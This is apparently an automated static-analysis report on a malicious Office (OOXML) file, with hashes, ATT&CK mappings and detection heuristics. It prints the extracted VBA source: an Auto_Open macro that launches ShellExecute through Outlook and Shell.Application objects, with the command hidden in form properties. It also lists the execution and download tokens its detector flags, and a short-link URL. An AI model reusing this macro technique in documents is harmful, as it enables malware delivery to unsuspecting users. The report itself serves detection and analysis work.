Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 66189c5af2d0dea4…

MALICIOUS

Office (OOXML)

8.7 KB First seen: 2021-08-20
MD5: b1bc7bc2d7fe2b9b02a3989b7917141a SHA-1: c7ff890bd511443e4980e2a2b3d0a10d9ff8b2b0 SHA-256: 66189c5af2d0dea4417d1c9b7d78b40c9347a7d94204ad75c73f090e9c019ac9
150 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1059 Command and Scripting Interpreter

The sample is an OOXML document containing a VBA macro that is automatically executed via the Auto_Open subroutine. This macro uses CreateObject to instantiate Outlook and Shell objects, and then calls ShellExecute with concatenated strings derived from the 'hola' module. This indicates an attempt to execute arbitrary code, likely to download and run a secondary payload. The VBA project part was renamed to evade detection, and the Auto_Open macro combined with CreateObject calls are high-confidence indicators of malicious intent.

Heuristics 6

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: ppt/kaskapsdlpalsd.b)
  • VBA project part renamed to evade filename detection high OOXML_VBA_PROJECT_RENAMED
    The VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set Outlook = CreateObject("Outlook.Application")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Auto_Open _
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://www.bitly.com/ashdiowkwoi In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 659 bytes
SHA-256: e473bea3b6bd8691b50e402cfd6e66da2144afa1a38678454ea5036cd5f5fe7a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module111"
Sub _
Auto_Open _
()
Set Outlook = CreateObject("Outlook.Application")
Set Microsoft = Outlook.CreateObject("Shell.Application")
Microsoft.ShellExecute hola.gola.Accelerator + hola.gola.ControlTipText, hola.gola.Caption
End _
Sub


Attribute VB_Name = "hola"
Attribute VB_Base = "0{559D5D9D-8678-495C-8412-C0918EDE6429}{58FAF3E2-E78A-4EE3-A7F6-E552181D8221}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CommandButton1_Click()

End Sub
vbaProject_00.bin vba-project OOXML VBA project: ppt/kaskapsdlpalsd.b 18432 bytes
SHA-256: c838cf10ccb31da069e910b97887a8e64b6667f16ee35fc3b7a9dcf4d2330659